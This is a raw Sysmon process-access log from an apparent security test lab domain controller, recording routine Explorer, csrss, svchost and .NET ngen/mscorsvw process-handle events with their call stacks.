14:58:30.576{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-DF97-607E-4709-00000000BB01}6584C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+d7a69|C:\Windows\System32\SHELL32.dll+d7a09|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802548EC8C8)|UNKNOWN(FFFFF40710BB4A38)|UNKNOWN(FFFFF40710BAF6E5)|UNKNOWN(FFFFF40710BB0C0A)|UNKNOWN(FFFFF40710BAEEC6)|UNKNOWN(FFFFF80254603E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+58ac4|C:\Windows\System32\SHELL32.dll+58807|C:\Windows\System32\SHELL32.dll+554f5 10341000x800000000000000080031Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:30.576{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-DF97-607E-4709-00000000BB01}6584C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+5c6b3|C:\Windows\System32\SHELL32.dll+57217|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080030Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:30.576{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-DF97-607E-4709-00000000BB01}6584C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+56f8f|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080029Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:30.576{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-DF97-607E-4709-00000000BB01}6584C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+56efa|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080028Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:30.576{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-DF97-607E-4709-00000000BB01}6584C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56ed6|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080027Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:30.576{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-DF97-607E-4709-00000000BB01}6584C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56ed6|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080026Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:30.566{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EC16-607E-5E0E-00000000BB01}6732C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080025Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:30.566{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC16-607E-5E0E-00000000BB01}6732C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080024Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:30.536{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-EC16-607E-5D0E-00000000BB01}5060C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080023Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:30.510{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EC16-607E-5D0E-00000000BB01}5060C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080022Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:30.510{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC16-607E-5D0E-00000000BB01}5060C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080021Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:30.476{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-EC16-607E-5C0E-00000000BB01}6784C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080020Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:30.466{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EC16-607E-5C0E-00000000BB01}6784C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080019Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:30.466{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC16-607E-5C0E-00000000BB01}6784C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080018Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:30.410{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-EC16-607E-5B0E-00000000BB01}1112C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080017Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:30.410{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EC16-607E-5B0E-00000000BB01}1112C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080016Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:30.410{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC16-607E-5B0E-00000000BB01}1112C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080015Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:30.366{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-EC16-607E-5A0E-00000000BB01}5300C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080014Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:30.356{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EC16-607E-5A0E-00000000BB01}5300C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080013Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:30.356{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC16-607E-5A0E-00000000BB01}5300C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080012Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:30.310{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-EC16-607E-590E-00000000BB01}2096C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080011Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:30.308{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EC16-607E-590E-00000000BB01}2096C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080010Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:30.308{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC16-607E-590E-00000000BB01}2096C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080009Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:30.256{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-EC16-607E-580E-00000000BB01}6948C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080008Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 